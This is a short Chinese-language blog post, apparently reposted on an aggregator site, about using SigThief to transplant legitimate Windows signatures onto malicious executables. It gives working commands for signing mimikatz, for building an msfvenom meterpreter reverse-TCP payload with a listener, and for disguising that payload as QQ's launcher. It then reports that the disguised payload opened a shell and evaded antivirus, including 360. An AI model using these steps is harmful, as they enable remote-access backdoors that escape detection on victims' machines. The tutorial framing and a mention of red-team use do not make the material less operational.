数字签名混淆 - 走看看

zoukankan html css js c++ java

数字签名混淆
Github

https://github.com/secretsquirrel/SigThief

Sigthief是劫持合法的数字签名并绕过Windows的哈希验证机制可以被红队用于将恶意二进制文件和PowerShell脚本与本机操作系统文件混合，以逃避检测并绕过设备防护。

1.首先是Github上的实例：

从一个二进制签名，并将其添加到另一个二进制文件

python sigthief.py -i c:WindowsSystem32consent.exe -t mimikatz.exe -o mimi.exe

借用msfvenom的payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.5 LPORT=4445 -f exe > lonsheng.exe
　　

启动监听模块
use exploit/multi/handler set LHOST 192.168.3.5 set LPORT 4445
　　

cd 进数字签名混淆的文件然后
python sigthief.py -i E:QQBinQQScLauncher.exe -t C:UsershackerDesktoplonsheng.exe -o jiu.exe
　　

然后运行jiu.exe可以看见返回了一个meterpreter

然后扔到http://r.virscan.org查毒

明显降低了查杀率而且还能过360

我们看看jiu.exe和longsheng.exe的对比
查看全文

相关阅读:
ASP.NET多线程下使用HttpContext.Current为null解决方案
 Pig性能优化
 重温设计模式之前言
 MVC4+WebApi+Redis Session共享练习(下)
C#中对象的输出
 CYQ.Data 支持WPF相关的数据控件绑定.Net获取iis版本
 java版微信公众平台自定义菜单创建代码实现
 android动画特效之解决解决移动后闪烁现象，解决输入法弹出后位置回复原状，解决两个动画叠加
 VMware 11安装Mac OS X 10.10 及安装Mac Vmware Tools（超详细），以及动态调整虚拟机硬盘大小
 三个API：开启、关闭、关闭线程重定向

原文地址：https://www.cnblogs.com/haq5201314/p/8213906.html

Copyright © 2011-2022 走看看